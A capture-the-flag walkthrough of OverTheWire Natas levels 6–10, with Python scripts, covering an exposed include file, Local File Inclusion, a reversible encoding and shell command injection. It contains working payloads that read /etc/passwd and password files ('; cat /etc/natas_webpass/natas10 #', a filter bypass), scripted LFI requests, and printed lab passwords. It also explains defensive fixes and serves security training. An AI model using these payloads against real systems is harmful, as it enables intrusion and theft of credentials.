
Natas: Level 6 - 10

Natas6

Username: natas6

Password: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Url: http://natas6.natas.labs.overthewire.org/

Viewing the page shows a simple text field.

Submitting anything to it returns a Wrong secret message.

There is a view source link as well, so let's check the source code.

The view source link gives us the PHP behind the form.

It compares our POST parameter secret with the variable $secret, and it includes a file, includes/secret.inc, which must be where $secret is defined. The web server only runs .php files through the PHP interpreter, so a direct request for includes/secret.inc should hand the file back as plain text. We can navigate to includes/secret.inc and see if we can view its source.

And we get the secret: FOEIUWGHFEEUHOFUOIU

Submitting this secret gets us the password for natas7.


Natas7

Username: natas7

Password: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Url: http://natas7.natas.labs.overthewire.org/

Here we have a simple page with two links. Clicking either one fetches the page through a GET parameter named page. Let's test for Local File Inclusion (LFI) by pointing that parameter at /etc/passwd.

The contents of /etc/passwd come back inside the page, so we have Local File Inclusion. Now let's find a file that contains the password for natas8.

From the home page of the Natas web challenges we know that

all passwords are stored in /etc/natas_webpass/natasX

The natas7 site runs as the natas7 user, and in Natas each level's user is allowed to read the next level's password file, so we should be able to include natas8's:

url: /index.php?page=/etc/natas_webpass/natas8
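The natas6 and natas7 steps above, scripted in Python as an added example (this is not code from the post or from the challenge). It uses only the standard library. Assumptions: the form's submit button is named submit, a natas password is a 32-character alphanumeric token (that regex is how the next password is picked out of the response), and the secret.inc text and page snippet used for checking are constructed samples. The HTTP requests only run when the script is executed directly.

```python
import base64
import re
import urllib.parse
import urllib.request
from typing import Optional

BASE = "http://natas{level}.natas.labs.overthewire.org/"


def build_url(level: int, path: str = "", params: Optional[dict] = None) -> str:
    """URL for a natas level; params become the query string with '/' left
    unescaped so the LFI path reads the same as it does in the browser."""
    url = BASE.format(level=level) + path
    if params:
        url += "?" + urllib.parse.urlencode(params, safe="/")
    return url


def natas_fetch(level: int, password: str, path: str = "",
                params: Optional[dict] = None, post: Optional[dict] = None) -> str:
    """GET (or POST when post is given) a natas page. Every level sits behind
    HTTP basic auth with that level's own username and password."""
    username = f"natas{level}"
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    data = urllib.parse.urlencode(post).encode() if post else None
    req = urllib.request.Request(build_url(level, path, params), data=data,
                                 headers={"Authorization": f"Basic {token}"})
    with urllib.request.urlopen(req, timeout=10) as resp:
        return resp.read().decode(errors="replace")


def extract_secret(inc_source: str) -> Optional[str]:
    """Pull $secret = "..." out of secret.inc, which the server returns as
    plain text because only .php files go through the interpreter."""
    m = re.search(r'\$secret\s*=\s*"([^"]*)"', inc_source)
    return m.group(1) if m else None


def extract_password(page: str) -> Optional[str]:
    """Assumption: a natas password is a 32-character alphanumeric token."""
    m = re.search(r"\b[A-Za-z0-9]{32}\b", page)
    return m.group(0) if m else None


def solve_natas6(password: str) -> Optional[str]:
    secret = extract_secret(natas_fetch(6, password, "includes/secret.inc"))
    # Assumption: the submit button's name is "submit".
    page = natas_fetch(6, password, post={"secret": secret, "submit": "submit"})
    return extract_password(page)


def solve_natas7(password: str) -> Optional[str]:
    # Local File Inclusion: index.php includes whatever ?page= points at.
    page = natas_fetch(7, password, "index.php", {"page": "/etc/natas_webpass/natas8"})
    return extract_password(page)


if __name__ == "__main__":
    natas7_password = solve_natas6("aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1")
    print("natas7:", natas7_password)
    print("natas8:", solve_natas7(natas7_password))
```

The same two fixes apply on the defending side: keep include files outside the web root (or give them a .php extension so they are never served raw), and never pass a request parameter to include(); resolve it against an allowlist of page names instead.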


Natas8

Username: natas8

Password: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Url: http://natas8.natas.labs.overthewire.org/

We notice that this site looks a lot like natas6, so let's check the source code again.

This time the secret is stored in an encoded form (not encrypted: there is no key involved, only reversible transformations). The server takes our input, runs it through the encodeSecret function and then checks whether the result equals the $encodedSecret variable.

First it will base64 encode -> reverse the string -> convert to hex

Let's do the opposite to the string we already have:

Convert from hex -> reverse the string -> base64 decode

I'll be using a tool called CyberChef to do this (https://gchq.github.io/CyberChef/)

And we get our secret.

Submitting oubWYf2kBq gets us the password for natas9.
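The same reversal done in Python, added here as an example rather than taken from the post or the challenge source. ENCODED_SECRET is the $encodedSecret value from the natas8 source; encode_secret re-implements the PHP encodeSecret routine (bin2hex(strrev(base64_encode($secret)))) so the recovered secret can be checked in both directions.

```python
import base64
import binascii

# The $encodedSecret constant from the natas8 source.
ENCODED_SECRET = "3d3d516343746d4d6d6c315669563362"


def encode_secret(secret: str) -> str:
    """Forward direction, as the server does it: base64 -> reverse -> hex."""
    b64 = base64.b64encode(secret.encode()).decode()
    return binascii.hexlify(b64[::-1].encode()).decode()


def decode_secret(encoded: str) -> str:
    """Inverse, one step at a time: hex -> reverse -> base64 decode."""
    reversed_b64 = binascii.unhexlify(encoded).decode()   # "==QcCtmMml1ViV3b"
    b64 = reversed_b64[::-1]                              # "b3ViV1lmMmtCcQ=="
    return base64.b64decode(b64).decode()


if __name__ == "__main__":
    secret = decode_secret(ENCODED_SECRET)
    print(secret)
    # Sanity check: re-encoding must give back the constant from the source.
    assert encode_secret(secret) == ENCODED_SECRET
```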


Natas9

Username: natas9

Password: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Url: http://natas9.natas.labs.overthewire.org/

Viewing the page we get an input box and a view source link.

Submitting anything appears to search for the word and print the matching lines, so let's look at the source code.

As we can see from the PHP code, it takes our input and uses the passthru function to grep the dictionary.txt file.

passthru hands its string to the system shell as a command, and our $key variable is spliced into that string unsanitized, meaning we can inject additional commands.

grep -i $key dictionary.txt

In bash we can end a command and start another one on the same line with ;

We can also comment out the rest of a line with #

If we inject a key like: ; cat /etc/passwd # the shell should execute the cat /etc/passwd command and show us the /etc/passwd file:

Bingo, we have command execution. Let's read the natas10 password file with: ; cat /etc/natas_webpass/natas10 #


Natas10

Username: natas10

Password: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Url: http://natas10.natas.labs.overthewire.org/

We get the same challenge as before, but now it states that the key we supply is filtered. Let's check the source code.

As we can see, it rejects any input containing ;, | or &, so the injection from before will not work because ; is not allowed. But # is still allowed, and so is a space: the key is spliced into the command unquoted, so whitespace in it becomes extra grep arguments, and # still comments out the trailing dictionary.txt. That means we can replace dictionary.txt with a file of our own choosing for grep to read from.

What if we supplied /etc/natas_webpass/natas11 as that file? grep prints the whole line whenever the pattern matches, so a single character that occurs anywhere in the password is enough to print the password line.

Let's try a /etc/natas_webpass/natas11 # -> nope

b /etc/natas_webpass/natas11 # -> nope

c /etc/natas_webpass/natas11 # -> bingo

We get the password for natas11. (A pattern of ., which matches any single character, would have worked on the first try.)
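To see the natas9 and natas10 injections side by side without touching a real server, here is a Python emulation added for this post (it is not code from the challenge). vulnerable_search splices the key into a shell command the way the challenge's passthru("grep -i $key dictionary.txt") does, with natas10's [;|&] check available as an option, and hardened_search shows the fix. dictionary.txt and the natas11 password file are constructed stand-ins written to a scratch directory, so nothing here reads /etc.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Constructed stand-ins for dictionary.txt and /etc/natas_webpass/natas11.
DICTIONARY = "apple\nbanana\ncherry\n"
FAKE_PASSWORD = "Q7cvTnX2mp4sW\n"      # made up; contains a 'c' but no 'a' or 'b'
ILLEGAL = re.compile(r"[;|&]")         # the three characters natas10 rejects


def make_workdir() -> str:
    """Create a temp directory holding the two sample files."""
    d = tempfile.mkdtemp()
    (Path(d) / "dictionary.txt").write_text(DICTIONARY)
    (Path(d) / "natas11").write_text(FAKE_PASSWORD)
    return d


def vulnerable_search(key: str, workdir: str, filtered: bool = False) -> str:
    """Emulates passthru("grep -i $key dictionary.txt"): the key is pasted
    into a command string and run through /bin/sh, exactly like natas9.
    filtered=True applies natas10's character filter first."""
    if filtered and ILLEGAL.search(key):
        return "Input contains an illegal character!"
    cmd = f"grep -i {key} dictionary.txt"
    proc = subprocess.run(cmd, shell=True, cwd=workdir,
                          capture_output=True, text=True)
    return proc.stdout


def hardened_search(key: str, workdir: str) -> str:
    """The fix: no shell at all, the key travels as a single argv element,
    and '--' stops a key beginning with '-' from being parsed as an option."""
    proc = subprocess.run(["grep", "-i", "--", key, "dictionary.txt"],
                          cwd=workdir, capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    wd = make_workdir()
    # natas9: ';' ends grep, 'cat' runs, '#' comments out dictionary.txt
    print(vulnerable_search("; cat natas11 #", wd), end="")
    # natas10: the same key is now rejected by the filter
    print(vulnerable_search("; cat natas11 #", wd, filtered=True))
    # natas10 bypass: extra grep argument plus '#', no forbidden characters
    print(vulnerable_search("c natas11 #", wd, filtered=True), end="")
    # hardened: the whole key is just a pattern, so nothing leaks
    print(repr(hardened_search("c natas11 #", wd)))
```

In the real challenge the key arrives via $_REQUEST, so spaces and # are URL-encoded on the wire; the emulation passes the decoded string straight in. The PHP equivalent of hardened_search is to wrap the key in escapeshellarg() before building the command, or better, to avoid the shell entirely.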

This post is licensed under CC BY 4.0 by the author.